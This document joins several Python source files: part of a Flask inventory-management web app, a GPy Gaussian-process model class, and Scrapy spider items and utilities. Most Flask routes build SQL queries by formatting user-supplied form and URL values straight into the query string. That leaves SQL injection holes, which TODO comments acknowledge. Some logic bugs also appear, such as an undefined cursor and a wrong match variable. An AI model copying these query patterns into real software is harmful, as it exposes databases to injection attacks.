elif request.form['name-form'] =='form4':
if form4.validate() == False:
flash("Failed to validate form", "danger")
return render_template('admin.html',
form=form,
form2=form2,
form3=form3,
form4=form4,
removeItemForm=removeItemForm,
transferItemForm = transferItemForm,
tagsByStore = json.dumps(storeTagChoices),
itemTags = json.dumps(itemTags),
cat_list = categories,
users=things,
tags = allTags,
server=server,
group=group)
else:
itemname = form4.itemname.data
tid = form4.tid.data
amt = form4.qty.data
try:
conn = mysql.connect()
cursor = conn.cursor()
cursor.execute("SELECT iid FROM Ascott_InvMgmt.Items WHERE name = '{}';".format(itemname))
iid = cursor.fetchall()[0][0]
# TODO: string parameterisation
# cursor = mysql.connect().commit();
# Check if item is already assigned to tag
cursor.execute("SELECT * FROM Ascott_InvMgmt.TagItems WHERE iid={} AND tag={};".format(iid, tid))
rowExists = cursor.fetchall()
if rowExists:
cursor.execute("UPDATE TagItems SET qty_left={} WHERE iid={} AND tag={};".format(amt, iid, tid))
conn.commit()
flash("Item already in location. Qty updated.", "success")
else:
query = "INSERT INTO Ascott_InvMgmt.TagItems VALUES ({},{},{}); COMMIT;".format(iid,tid,amt)
print(query)
cursor.execute(query)
flash("Added Item to Location!", "success")
except:
flash("Oops! Something went wrong :(", "danger")
return redirect(url_for('admin', lang_code=get_locale()))
# ------------------ Transfer Items Form ----------------------
elif request.form['name-form'] =='transferItemForm':
if transferItemForm.validate() == False:
flash("Failed to validate form", "danger")
return render_template('admin.html',
form=form,
form2=form2,
form3=form3,
form4=form4,
removeItemForm=removeItemForm,
transferItemForm = transferItemForm,
tagsByStore = json.dumps(storeTagChoices),
itemTags = json.dumps(itemTags),
cat_list = categories,
users=things,
tags = allTags,
server=server,
group=group)
else:
print("form validated")
item = transferItemForm.iname.data
tagOld = transferItemForm.tagOld.data
tagNew = transferItemForm.tagNew.data
qty = transferItemForm.qty.data
print(item)
print(tagOld)
print(tagNew)
print(qty)
try:
conn = mysql.connect()
cursor = conn.cursor()
query = "SELECT iid FROM Ascott_InvMgmt.Items WHERE name = '{}';".format(item)
print(query)
cursor.execute(query)
iid = cursor.fetchall()[0][0]
query = "SELECT * FROM TagItems WHERE iid={} AND tag={};".format(iid, tagOld)
print(query)
cursor.execute(query)
row = cursor.fetchall()[0]
# TODO: string parameterisation
queryOut = ""
queryIn = ""
message = ""
# if user only wants to transfer some of the items over
if qty:
if qty == 0:
flash("Qty input was 0, none transferred.", "warning")
return redirect(url_for('admin', lang_code=get_locale()))
print(row)
# check if there are enough items at the old location to transfer the stated qty.
if qty > row[2]:
raise InsufficientQtyError("Not enough in store to transfer!")
# if sufficient items, deduct items from old location.
qty_left = row[2] - qty
if qty_left == 0:
queryOut = "DELETE FROM TagItems WHERE iid={} AND tag={};".format(iid, tagOld)
else:
queryOut = "UPDATE TagItems SET qty_left={} WHERE iid={} AND tag={};".format(qty_left, iid, tagOld)
# if user wants to transfer all
else:
qty = row[2]
queryOut = "DELETE FROM TagItems WHERE iid={} AND tag={};".format(iid, tagOld)
print(queryOut)
# Add the items to the new location.
# Check if there are already instances of the item at the new location.
query = "SELECT * FROM Ascott_InvMgmt.TagItems WHERE iid={} AND tag={};".format(iid, tagNew)
print(query)
cursor = mysql.connect().cursor()
cursor.execute(query)
rowExists = cursor.fetchall()
if rowExists:
print('row exists!')
# Update the qty instead of creating a new row.
newQty = rowExists[0][2] + qty
queryIn = "UPDATE TagItems SET qty_left={} WHERE iid={} AND tag={};".format(newQty, iid, tagNew)
message = "Item already in location, updated qty."
else:
print('row does not exist')
# Create a new row.
queryIn = "INSERT INTO Ascott_InvMgmt.TagItems VALUES ({},{},{});".format(iid, tagNew, qty)
message = "Transferred item to location!"
print(queryIn)
flash(message, "success")
conn = mysql.connect()
cursor = conn.cursor()
cursor.execute(queryIn + queryOut + "COMMIT;")
except InsufficientQtyError as e:
flash(e.args[0], "danger")
except:
flash("Oops! Something went wrong :(", "danger")
return redirect(url_for('admin', lang_code=get_locale()))
# ------------------Remove Item From Tag Form ----------------------
elif request.form['name-form'] =='removeFromTag':
print('form received')
item = request.form["iid"]
tag = request.form["tid"]
try:
conn = mysql.connect()
cursor = conn.cursor()
query = "DELETE FROM TagItems WHERE iid={} AND tag={};".format(item, tag)
print(query)
cursor.execute(query)
conn.commit()
flash("Item removed from tag!", "success")
except:
flash("Oops! Something went wrong :(", "danger")
return redirect(url_for('admin', lang_code=get_locale()))
# ------------------Add Tag form ----------------------
# TODO: Change form to get appropriate values
elif request.form['name-form'] =='form3':
if form3.validate() == False:
flash("Failed to validate form", "danger")
return render_template('admin.html',
form=form,
form2=form2,
form3=form3,
form4=form4,
removeItemForm=removeItemForm,
transferItemForm = transferItemForm,
tagsByStore = json.dumps(storeTagChoices),
itemTags = json.dumps(itemTags),
cat_list = categories,
users=things,
tags = allTags,
server=server,
group=group)
else:
tname = form3.tname.data
oldLocation = form3.location.data
newLocation = form3.newLocation.data
remarks = form3.remarks.data
if newLocation:
location = newLocation
else:
location = oldLocation
conn = mysql.connect()
cursor = conn.cursor()
try:
# TODO: string parameterisation
query = "INSERT INTO TagInfo (`tname`, `storeroom`, `remarks`) VALUES ('{}','{}','{}');".format(tname, location, remarks)
print(query)
cursor.execute(query)
conn.commit()
flash("New Tag Added!", "success")
except:
flash("Couldn't add tag.", "danger")
return redirect(url_for('admin', lang_code=get_locale()))
# ------------------Delete Tag form ----------------------
elif request.form['name-form'] =='deleteTag':
print('form received')
tid = request.form["tid"]
try:
conn = mysql.connect().cursor()
cursor.execute("SELECT * FROM TagItems WHERE tag={};".format(tid))
tagRows = cursor.fetchone()
if tagRows:
raise ContainsItemsError("Can't delete tag because it has items assigned to it. Please remove the items from the tag before deleting the tag.")
else:
conn = mysql.connect()
cursor = conn.cursor()
query = "DELETE FROM TagInfo WHERE tid={};".format(tid)
print(query)
cursor.execute(query)
conn.commit()
flash("Tag deleted!", "success")
except ContainsItemsError as e:
flash(e.args[0], "danger")
except:
flash("Oops! Something went wrong :(", "danger")
return redirect(url_for('admin', lang_code=get_locale()))
@application.route('/<lang_code>/dashboard')
def dashboard():
# user authentication
if not auth():
session['next'] = request.url
return redirect(url_for("login", lang_code=get_locale()))
if session['role'] != "supervisor":
return redirect(url_for("scanner", lang_code=get_locale()))
i = getInventoryLow()
l = getDailyLogs()
print(l)
# l = getLogs()
return render_template('dashboard.html',
role=session['role'],
user=session['username'],
items = i,
logs = l)
@application.route('/<lang_code>/inventory')
def inventory():
# user authentication
if not auth():
session['next'] = request.url
return redirect(url_for("login", lang_code=get_locale()))
if session['role'] != "supervisor":
return redirect(url_for("scanner", lang_code=get_locale()))
cursor = mysql.connect().cursor()
cursor.execute("SELECT DISTINCT category FROM Items;")
cats = cursor.fetchall()
itemsByCat = []
for cat in cats:
itemsByCat.append({cat[0].encode('ascii'):[]})
data = inventoryQuick(None)
for i in data:
for cat in itemsByCat:
if cat.keys()[0] == i['category']:
cat[i['category']].append(i)
print(i['category'])
# get list of all locations to display
location_query = "SELECT DISTINCT TagInfo.storeroom FROM TagItems INNER JOIN TagInfo ON TagItems.tag = TagInfo.tid;"
cursor = mysql.connect().cursor()
cursor.execute(location_query)
data = cursor.fetchall()
locations = []
for i in data:
locations.append(i[0].encode('ascii'))
return render_template('inventory.html',
user = session['username'],
role = session['role'],
categories = itemsByCat,
num_cat = len(itemsByCat),
locations = locations)
@application.route('/<lang_code>/inventory/<int:iid>', methods=['GET', 'POST'])
def item(iid):
# user authentication
if not auth():
session['next'] = request.url
return redirect(url_for("login", lang_code=get_locale()))
if session['role'] != "supervisor":
return redirect(url_for("scanner", lang_code=get_locale()))
if request.method == 'POST':
print "STOCK UPDATE: content_type - ", request.content_type
now = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
user = session['username']
# form data
tid = int(request.form.get('location'))
qty = int(request.form.get('qty'))
action = request.form.get('action')
print("STOCK UPDATE: Form received - (iid: %s ,tid: %s, qty: %s , action: %s, user: %s)" %
(iid, tid, qty, action, user))
try:
# process changes
updateSuccess = stockUpdate(iid, tid, qty, user, action, now)
flash(updateSuccess[0], updateSuccess[1])
return redirect(url_for("item", lang_code=get_locale(), iid=iid))
except:
flash('Oops! Something went wrong :(', 'danger')
return redirect(url_for("item", lang_code=get_locale(), iid=iid))
cursor = mysql.connect().cursor()
query = "SELECT name, category, picture, tag, qty_left, reorder_pt, in_out_ratio, out_by, price FROM Ascott_InvMgmt.view_item_locations WHERE iid = {};".format(iid)
cursor.execute(query)
data = cursor.fetchall()
# d = [[s.encode('ascii') for s in list] for list in data]
r = []
for i in data:
cursor.execute("SELECT tname, storeroom FROM TagInfo WHERE tid={};".format(i[3]))
taginfo = cursor.fetchall()[0]
tname = taginfo[0].encode('ascii')
storeroom = taginfo[1].encode('ascii')
r.append({"name": i[0].encode('ascii'),
"category": i[1].encode('ascii'),
"picture": i[2].encode('ascii'),
"tag": tname,
"location": storeroom,
"qty_left": i[4],
"reorder": i[5],
"batch_size": i[6],
"unit": i[7].encode('ascii'),
"price": round(i[8],2),
"tid": i[3],
"iid": iid})
cursor.execute("SELECT new_price, date_effective FROM Ascott_InvMgmt.PriceChange WHERE item = '{}';".format(iid))
price = cursor.fetchall()
pricechanges = []
if price == ():
pricechanges.append({
"iid":iid,
"new_price": 0,
"date_effective": 0})
else:
for item in price:
pricechanges.append({
"iid":iid,
"new_price": item[0],
"date_effective": item[1]})
try:
if r != []:
return render_template('item.html', item = r, pricechanges = pricechanges)
else:
return render_template('item.html', item = r, pricechanges = pricechanges)
except:
return render_template('item.html', item = r, pricechanges = None)
@application.route('/<lang_code>/review/<category>')
def category(category):
# user authentication
if not auth():
session['next'] = request.url
return redirect(url_for("login", lang_code=get_locale()))
if session['role'] != "supervisor":
return redirect(url_for("scanner", lang_code=get_locale()))
category = category
itemtype = getAllInventory(category)
return render_template('category.html',
category=category,
itemtype=itemtype,
role = session['role'],
user = session['username'])
@application.route('/<lang_code>/storeroom/<storeroom>')
def storeroom(storeroom):
# user authentication
if not auth():
session['next'] = request.url
return redirect(url_for("login", lang_code=get_locale()))
if session['role'] != "supervisor":
return redirect(url_for("scanner", lang_code=get_locale()))
cursor = mysql.connect().cursor()
query1="SELECT tid FROM TagInfo WHERE storeroom='{}';".format(storeroom)
cursor.execute(query1)
tags = cursor.fetchall()
items = {}
for t in tags:
tagid=t[0]
cursor.execute("SELECT iid, name, picture, reorder_pt, qty_left, out_by FROM view_item_locations WHERE tag='{}';".format(tagid))
data = cursor.fetchall()
for d in data:
if d[0] in items.keys():
items[d[0]]['qty_left'] += d[4]
else:
items[d[0]] = {
'name':d[1].encode('ascii'),
'picture':d[2].encode('ascii'),
'reorder_pt':d[3],
'qty_left':d[4],
'unit':d[5].encode('ascii')
}
print(t)
print(tags)
return render_template('storeroom.html',
storename = storeroom,
items = items,
user = session['username'],
role = session['role'])
@application.route('/<lang_code>/logs')
def logs():
# user authentication
if not auth():
session['next'] = request.url
return redirect(url_for("login", lang_code=get_locale()))
if session['role'] != "supervisor":
return redirect(url_for("scanner", lang_code=get_locale()))
logs=getAllLogs()
# names=getUniqueNames()
# items=getUniqueItems()
return render_template('logs.html',
logs=logs,
role = session['role'],
user = session['username'])
# names=names, items=items)
@application.route('/<lang_code>/scan')
def scanner():
# user authentication
if not auth():
session['next'] = request.url
return redirect(url_for("login", lang_code=get_locale()))
return render_template('scanner.html')
# RA shelf view
@application.route('/<lang_code>/shelves/<tag_id>', methods=['GET', 'POST'])
def shelf(tag_id):
# user authentication
if not auth():
session['next'] = request.url
return redirect(url_for("login", lang_code=get_locale()))
cursor = mysql.connect().cursor()
items = inventoryQuick(tag_id)
cursor.execute("""SELECT tname FROM TagInfo WHERE tid={};""".format(tag_id))
tagName = cursor.fetchone()[0].encode('ascii')
if request.method == 'POST':
now = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
form_data = request.form
print(form_data)
user = session['username']
try:
conn = mysql.connect()
cursor = conn.cursor()
for item, [inputQty, action, tag] in form_data.iterlists():
updateSuccess = stockUpdate(item, tag, int(inputQty), user, action, now)
flash(updateSuccess[0], updateSuccess[1])
return redirect(url_for("scanner", lang_code=get_locale()))
except Exception as e:
print("CART ERROR: %s" % e)
flash('Oops! Something went wrong :(', 'danger')
return render_template('shelf.html', things=items,
role = session['role'],
user = session['username'],
location = tag_id,
tagName = tagName)
@application.route('/logout')
def logout():
session.clear()
return redirect(url_for("login", lang_code=get_locale()))
@application.errorhandler(404)
def page_not_found(e):
return render_template('error/404.html', error=e), 404
@application.errorhandler(500)
def page_not_found(e):
return render_template('error/500.html', error=e), 500
## testing
if __name__ == '__main__':
application.run()
``` |
{
"source": "jinjiaodawang/bayesmark",
"score": 2
} |
#### File: models/gp/gpy_mlp.py
```python
# This program is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
# PARTICULAR PURPOSE. See the MIT License for more details.
from ..base_model import BaseModel
from ..layers import EmbTransform, OneHotTransform
from ..scalers import TorchMinMaxScaler, TorchStandardScaler
import GPy
import torch
import torch.nn as nn
import numpy as np
from torch import Tensor, FloatTensor, LongTensor
class GPyMLPGP(BaseModel):
"""
Input warped GP model implemented using GPy instead of GPyTorch
Why doing so:
- Input warped GP
"""
def __init__(self, num_cont, num_enum, num_out, **conf):
super().__init__(num_cont, num_enum, num_out, **conf)
if num_enum > 0:
self.one_hot = OneHotTransform(self.conf['num_uniqs'])
self.xscaler = TorchMinMaxScaler((-1, 1))
self.yscaler = TorchStandardScaler()
self.verbose = self.conf.get('verbose', False)
self.num_epochs = self.conf.get('num_epochs', 200)
def fit_scaler(self, Xc : FloatTensor, y : FloatTensor):
if Xc is not None and Xc.shape[1] > 0:
self.xscaler.fit(Xc)
self.yscaler.fit(y)
def trans(self, Xc : Tensor, Xe : Tensor, y : Tensor = None):
if Xc is not None and Xc.shape[1] > 0:
Xc_t = self.xscaler.transform(Xc)
else:
Xc_t = torch.zeros(Xe.shape[0], 0)
if Xe is None or Xe.shape[1] == 0:
Xe_t = torch.zeros(Xc.shape[0], 0)
else:
Xe_t = self.one_hot(Xe.long())
Xall = torch.cat([Xc_t, Xe_t], dim = 1)
if y is not None:
y_t = self.yscaler.transform(y)
return Xall.numpy(), y_t.numpy()
return Xall.numpy()
def fit(self, Xc : FloatTensor, Xe : LongTensor, y : LongTensor):
self.fit_scaler(Xc, y)
X, y = self.trans(Xc, Xe, y)
kern = GPy.kern.src.mlp.MLP(input_dim = X.shape[1], ARD = True)
self.gp = GPy.models.GPRegression(X, y, kern)
self.gp.kern.variance = np.var(y)
self.gp.kern.lengthscale = np.std(X, axis = 0)
self.gp.likelihood.variance = 1e-2 * np.var(y)
self.gp.kern.variance.set_prior(GPy.priors.Gamma(0.5, 0.5))
self.gp.likelihood.variance.set_prior(GPy.priors.LogGaussian(-4.63, 0.5))
self.gp.optimize_restarts(max_iters = self.num_epochs, messages = self.verbose, num_restarts = 10)
print(self.gp.likelihood.variance, flush = True)
print(self.gp.likelihood.variance[0], flush = True)
return self
def predict(self, Xc : FloatTensor, Xe : LongTensor) -> (FloatTensor, FloatTensor):
Xall = self.trans(Xc, Xe)
py, ps2 = self.gp.predict(Xall)
mu = self.yscaler.inverse_transform(FloatTensor(py).view(-1, 1))
var = (self.yscaler.std**2 * FloatTensor(ps2).view(-1, 1)).clamp(min = 1e-6)
return mu, var
def sample_f(self):
raise RuntimeError('Thompson sampling is not supported for GP, use `sample_y` instead')
@property
def noise(self):
var_normalized = self.gp.likelihood.variance[0]
return (var_normalized * self.yscaler.std**2).view(self.num_out)
@property
def support_ts(self):
return False
@property
def support_grad(self):
return False
@property
def support_multi_output(self):
return False
@property
def support_warm_start(self) ->bool:
return False
``` |
{
"source": "jinjie412/ArticleSpider",
"score": 3
} |
#### File: ArticleSpider/ArticleSpider/items.py
```python
import datetime
import re
from ArticleSpider.settings import SQL_DATETIME_FORMAT
from ArticleSpider.utils.common import extract_num, extract_num_include_dot
import scrapy
from scrapy.loader import ItemLoader
from scrapy.loader.processors import TakeFirst, MapCompose, Join
from w3lib.html import remove_tags
class ArticlespiderItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
pass
# 字符串转换时间方法
def date_convert(value):
try:
create_date = datetime.datetime.strptime(value, "%Y/%m/%d").date()
except Exception as e:
create_date = datetime.datetime.now().date()
return create_date
# 获取字符串内数字方法
def get_nums(value):
match_re = re.match(".*?(\d+).*", value)
if match_re:
nums = int(match_re.group(1))
else:
nums = 0
return nums
# 去除标签中提取的评论方法
def remove_comment_tags(value):
if "评论" in value:
return ""
else:
return value
# 直接获取值方法
def return_value(value):
return value
# 排除none值
def exclude_none(value):
if value:
return value
else:
value = "无"
return value
# 自定义itemloader实现默认取第一个值
class ArticleItemLoader(ItemLoader):
default_output_processor = TakeFirst()
class FangItem(scrapy.Item):
id = scrapy.Field()
name = scrapy.Field(
)
price = scrapy.Field()
address = scrapy.Field()
tags = scrapy.Field(
)
crawl_time = scrapy.Field()
def get_insert_sql(self):
insert_sql = """
insert into fang(id, name, price,address, tags, crawl_time
)
VALUES (%s, %s, %s,%s, %s, %s) ON DUPLICATE KEY UPDATE price=VALUES(price)
"""
crawl_time = datetime.datetime.now().strftime(SQL_DATETIME_FORMAT)
self["crawl_time"] = crawl_time
self["name"] = self["name"].strip()
match_hans5 = re.match(
".*>([\u4e00-\u9fa5]+)<.*>([\u4e00-\u9fa5]+)<.*>([\u4e00-\u9fa5]+)<.*>([\u4e00-\u9fa5]+)<.*>([\u4e00-\u9fa5]+)<.*",
self["tags"],
re.DOTALL)
match_hans4 = re.match(
".*>([\u4e00-\u9fa5]+)<.*>([\u4e00-\u9fa5]+)<.*>([\u4e00-\u9fa5]+)<.*>([\u4e00-\u9fa5]+)<.*",
self["tags"], re.DOTALL)
match_hans3 = re.match(
".*>([\u4e00-\u9fa5]+)<.*>([\u4e00-\u9fa5]+)<.*>([\u4e00-\u9fa5]+)<.*",
self["tags"],
re.DOTALL)
match_hans2 = re.match(
".*>([\u4e00-\u9fa5]+)<.*>([\u4e00-\u9fa5]+)<.*",
self["tags"],
re.DOTALL)
match_hans1 = re.match(
".*>([\u4e00-\u9fa5]+)<.*",
self["tags"],
re.DOTALL)
if match_hans5:
self["tags"] = match_hans5.group(1) + "," + match_hans5.group(2) + match_hans5.group(
3) + "," + match_hans5.group(4) + "," + match_hans5.group(5)
elif match_hans4:
self["tags"] = match_hans4.group(1) + "," + match_hans4.group(
2) + match_hans4.group(3) + "," + match_hans4.group(4)
elif match_hans3:
self["tags"] = match_hans3.group(
1) + "," + match_hans3.group(2) + "," + match_hans3.group(3)
elif match_hans2:
self["tags"] = match_hans2.group(
1) + "," + match_hans2.group(2)
elif match_hans1:
self["tags"] = match_hans1.group(1)
else:
self["tags"] = ""
params = (
self["id"],
self["name"],
self["price"],
self["address"],
self["tags"],
self["crawl_time"])
return insert_sql, params
class JobBoleArticleItem(scrapy.Item):
title = scrapy.Field()
create_date = scrapy.Field(
# input_processor=MapCompose(date_convert),
)
url = scrapy.Field()
url_object_id = scrapy.Field()
front_image_url = scrapy.Field(
# 使用自定义的outprocessor覆盖原始的take first 使得image_url是一个列表。
output_processor=MapCompose(return_value)
)
front_image_path = scrapy.Field()
praise_nums = scrapy.Field(
# input_processor=MapCompose(get_nums)
)
comment_nums = scrapy.Field(
input_processor=MapCompose(get_nums)
)
fav_nums = scrapy.Field(
input_processor=MapCompose(get_nums)
)
tags = scrapy.Field(
input_processor=MapCompose(remove_comment_tags),
# list使用逗号连接
output_processor=Join(",")
)
content = scrapy.Field()
crawl_time = scrapy.Field()
def make_data_clean(self):
front_image_url = ""
# content = remove_tags(self["content"])
self["crawl_time"] = datetime.datetime.now(
).strftime(SQL_DATETIME_FORMAT)
if self["front_image_url"]:
self["front_image_url"] = self["front_image_url"][0]
str = self["create_date"].strip().replace("·", "").strip()
self["create_date"] = datetime.datetime.strptime(
str, "%Y/%m/%d").date()
nums = 0
value = self["praise_nums"]
match_re = re.match(".*?(\d+).*", value)
if match_re:
nums = int(match_re.group(1))
else:
nums = 0
self["praise_nums"] = nums
def get_insert_sql(self):
insert_sql = """
insert into jobbole_article(title, url, url_object_id,create_date, fav_nums, front_image_url, front_image_path,
praise_nums, comment_nums, tags, content,crawl_time)
VALUES (%s, %s, %s,%s, %s, %s, %s, %s, %s, %s, %s,%s) ON DUPLICATE KEY UPDATE fav_nums=VALUES(fav_nums),praise_nums=VALUES(praise_nums),comment_nums=VALUES(comment_nums),crawl_time=VALUES(crawl_time)
"""
self.make_data_clean()
params = (
self["title"],
self["url"],
self["url_object_id"],
self["create_date"],
self["fav_nums"],
self["front_image_url"],
self["front_image_path"],
self["praise_nums"],
self["comment_nums"],
self["tags"],
self["content"],
self["crawl_time"]
)
return insert_sql, params
class ZhihuQuestionItem(scrapy.Item):
# 知乎的问题 item
zhihu_id = scrapy.Field()
topics = scrapy.Field()
url = scrapy.Field()
title = scrapy.Field()
content = scrapy.Field(
input_processor=MapCompose(exclude_none),
)
answer_num = scrapy.Field()
comments_num = scrapy.Field()
watch_user_num = scrapy.Field()
click_num = scrapy.Field()
crawl_time = scrapy.Field()
def get_insert_sql(self):
# 插入知乎question表的sql语句
insert_sql = """
insert into zhihu_question(zhihu_id, topics, url, title, content, answer_num, comments_num,
watch_user_num, click_num, crawl_time
)
VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)
ON DUPLICATE KEY UPDATE content=VALUES(content), answer_num=VALUES(answer_num), comments_num=VALUES(comments_num),
watch_user_num=VALUES(watch_user_num), click_num=VALUES(click_num)
"""
zhihu_id = self["zhihu_id"][0]
topics = ",".join(self["topics"])
url = self["url"][0]
title = "".join(self["title"])
try:
content = "".join(self["content"])
except BaseException:
content = "无"
try:
answer_num = extract_num("".join(self["answer_num"]))
except BaseException:
answer_num = 0
comments_num = extract_num("".join(self["comments_num"]))
if len(self["watch_user_num"]) == 2:
watch_user_num = extract_num_include_dot(self["watch_user_num"][0])
click_num = extract_num_include_dot(self["watch_user_num"][1])
else:
watch_user_num = extract_num_include_dot(self["watch_user_num"][0])
click_num = 0
crawl_time = datetime.datetime.now().strftime(SQL_DATETIME_FORMAT)
params = (
zhihu_id,
topics,
url,
title,
content,
answer_num,
comments_num,
watch_user_num,
click_num,
crawl_time)
return insert_sql, params
class ZhihuAnswerItem(scrapy.Item):
# 知乎的问题回答item
zhihu_id = scrapy.Field()
url = scrapy.Field()
question_id = scrapy.Field()
author_id = scrapy.Field()
content = scrapy.Field()
praise_num = scrapy.Field()
comments_num = scrapy.Field()
create_time = scrapy.Field()
update_time = scrapy.Field()
crawl_time = scrapy.Field()
author_name = scrapy.Field()
def get_insert_sql(self):
# 插入知乎answer表的sql语句
insert_sql = """
insert into zhihu_answer(zhihu_id, url, question_id, author_id, content, praise_num, comments_num,
create_time, update_time, crawl_time,author_name
) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s,%s)
ON DUPLICATE KEY UPDATE content=VALUES(content), comments_num=VALUES(comments_num), praise_num=VALUES(praise_num),
update_time=VALUES(update_time), author_name=VALUES(author_name)
"""
create_time = datetime.datetime.fromtimestamp(
self["create_time"]).strftime(SQL_DATETIME_FORMAT)
update_time = datetime.datetime.fromtimestamp(
self["update_time"]).strftime(SQL_DATETIME_FORMAT)
params = (
self["zhihu_id"], self["url"], self["question_id"],
self["author_id"], self["content"], self["praise_num"],
self["comments_num"], create_time, update_time,
self["crawl_time"].strftime(SQL_DATETIME_FORMAT),
self["author_name"],
)
return insert_sql, params
def remove_splash(value):
# 去掉工作城市的斜线
return value.replace("/", "")
def handle_jobaddr(value):
addr_list = value.split("\n")
addr_list = [item.strip() for item in addr_list if item.strip() != "查看地图"]
return "".join(addr_list)
class LagouJobItemLoader(ItemLoader):
# 自定义itemloader
default_output_processor = TakeFirst()
class LagouJobItem(scrapy.Item):
# 拉勾网职位信息
title = scrapy.Field()
url = scrapy.Field()
url_object_id = scrapy.Field()
salary_min = scrapy.Field()
salary_max = scrapy.Field()
job_city = scrapy.Field(
input_processor=MapCompose(remove_splash),
)
work_years_min = scrapy.Field(
input_processor=MapCompose(remove_splash),
)
work_years_max = scrapy.Field(
input_processor=MapCompose(remove_splash),
)
degree_need = scrapy.Field(
input_processor=MapCompose(remove_splash),
)
job_type = scrapy.Field()
publish_time = scrapy.Field()
job_advantage = scrapy.Field()
job_desc = scrapy.Field()
job_addr = scrapy.Field(
input_processor=MapCompose(remove_tags, handle_jobaddr),
)
company_name = scrapy.Field()
company_url = scrapy.Field()
tags = scrapy.Field(
input_processor=Join(",")
)
crawl_time = scrapy.Field()
crawl_update_time = scrapy.Field()
def get_insert_sql(self):
insert_sql = """
insert into lagou_job(title, url, url_object_id, salary_min, salary_max, job_city, work_years_min, work_years_max, degree_need,
job_type, publish_time, job_advantage, job_desc, job_addr, company_name, company_url,
tags, crawl_time) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)
ON DUPLICATE KEY UPDATE salary_min=VALUES(salary_min), salary_max=VALUES(salary_max), job_desc=VALUES(job_desc)
"""
match_obj1 = re.match("经验(\d+)-(\d+)年", self['work_years_min'])
match_obj2 = re.match("经验应届毕业生", self['work_years_min'])
match_obj3 = re.match("经验不限", self['work_years_min'])
match_obj4 = re.match("经验(\d+)年以下", self['work_years_min'])
match_obj5 = re.match("经验(\d+)年以上", self['work_years_min'])
if match_obj1:
self['work_years_min'] = match_obj1.group(1)
self['work_years_max'] = match_obj1.group(2)
elif match_obj2:
self['work_years_min'] = 0.5
self['work_years_max'] = 0.5
elif match_obj3:
self['work_years_min'] = 0
self['work_years_max'] = 0
elif match_obj4:
self['work_years_min'] = 0
self['work_years_max'] = match_obj4.group(1)
elif match_obj5:
self['work_years_min'] = match_obj4.group(1)
self['work_years_max'] = match_obj4.group(1) + 100
else:
self['work_years_min'] = 999
self['work_years_max'] = 999
match_salary = re.match("(\d+)[Kk]-(\d+)[Kk]", self['salary_min'])
if match_salary:
self['salary_min'] = match_salary.group(1)
self['salary_max'] = match_salary.group(2)
else:
self['salary_min'] = 666
self['salary_max'] = 666
match_time1 = re.match("(\d+):(\d+).*", self["publish_time"])
match_time2 = re.match("(\d+)天前.*", self["publish_time"])
match_time3 = re.match("(\d+)-(\d+)-(\d+)", self["publish_time"])
if match_time1:
today = datetime.datetime.now()
hour = int(match_time1.group(1))
minutues = int(match_time1.group(2))
time = datetime.datetime(
today.year, today.month, today.day, hour, minutues)
self["publish_time"] = time.strftime(SQL_DATETIME_FORMAT)
elif match_time2:
days_ago = int(match_time2.group(1))
today = datetime.datetime.now() - datetime.timedelta(days=days_ago)
self["publish_time"] = today.strftime(SQL_DATETIME_FORMAT)
elif match_time3:
year = int(match_time3.group(1))
month = int(match_time3.group(2))
day = int(match_time3.group(3))
today = datetime.datetime(year, month, day)
self["publish_time"] = today.strftime(SQL_DATETIME_FORMAT)
else:
self["publish_time"] = datetime.datetime.now(
).strftime(SQL_DATETIME_FORMAT)
params = (
self["title"],
self["url"],
self["url_object_id"],
self["salary_min"],
self["salary_max"],
self["job_city"],
self["work_years_min"],
self["work_years_max"],
self["degree_need"],
self["job_type"],
self["publish_time"],
self["job_advantage"],
self["job_desc"],
self["job_addr"],
self["company_name"],
self["company_url"],
self["tags"],
self["crawl_time"].strftime(SQL_DATETIME_FORMAT),
)
return insert_sql, params
```
#### File: ArticleSpider/utils/common.py
```python
import re
__author__ = 'mtianyan'
__date__ = '2018/1/18 0018 03:52'
import hashlib
import collections
class OrderedSet(collections.OrderedDict, collections.MutableSet):
def update(self, *args, **kwargs):
if kwargs:
raise TypeError("update() takes no keyword arguments")
for s in args:
for e in s:
self.add(e)
def add(self, elem):
self[elem] = None
def discard(self, elem):
self.pop(elem, None)
def __le__(self, other):
return all(e in other for e in self)
def __lt__(self, other):
return self <= other and self != other
def __ge__(self, other):
return all(e in self for e in other)
def __gt__(self, other):
return self >= other and self != other
def __repr__(self):
return 'OrderedSet([%s])' % (', '.join(map(repr, self.keys())))
def __str__(self):
return '{%s}' % (', '.join(map(repr, self.keys())))
difference = property(lambda self: self.__sub__)
difference_update = property(lambda self: self.__isub__)
intersection = property(lambda self: self.__and__)
intersection_update = property(lambda self: self.__iand__)
issubset = property(lambda self: self.__le__)
issuperset = property(lambda self: self.__ge__)
symmetric_difference = property(lambda self: self.__xor__)
symmetric_difference_update = property(lambda self: self.__ixor__)
union = property(lambda self: self.__or__)
def get_md5(url):
# str就是unicode了.Python3中的str对应2中的Unicode
if isinstance(url, str):
url = url.encode("utf-8")
m = hashlib.md5()
m.update(url)
return m.hexdigest()
def extract_num(text):
#从字符串中提取出数字
match_re = re.match(".*?(\d+).*", text)
if match_re:
nums = int(match_re.group(1))
else:
nums = 0
return nums
def extract_num_include_dot(text):
# 从包含,的字符串中提取出数字
text_num = text.replace(',', '')
try:
nums = int(text_num)
except:
nums = -1
return nums
if __name__ == "__main__":
print(get_md5("http://jobbole.com".encode("utf-8")))
```
#### File: ArticleSpider/utils/login_zhihu.py
```python
__author__ = 'mtianyan'
__date__ = '2018/1/18 0018 23:48'
import requests
from parsel import Selector
import json
import time
from copyheaders import headers_raw_to_dict
import execjs
from requests_toolbelt.multipart.encoder import MultipartEncoder
# 登录后保存cookis到本地
try:
import cookielib
except BaseException:
import http.cookiejar as cookielib
s = requests.session()
s.cookies = cookielib.LWPCookieJar(filename="cookies.txt")
try:
s.cookies.load(ignore_discard=True)
except BaseException:
print ("cookie未能加载")
# useragent信息
s.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'
}
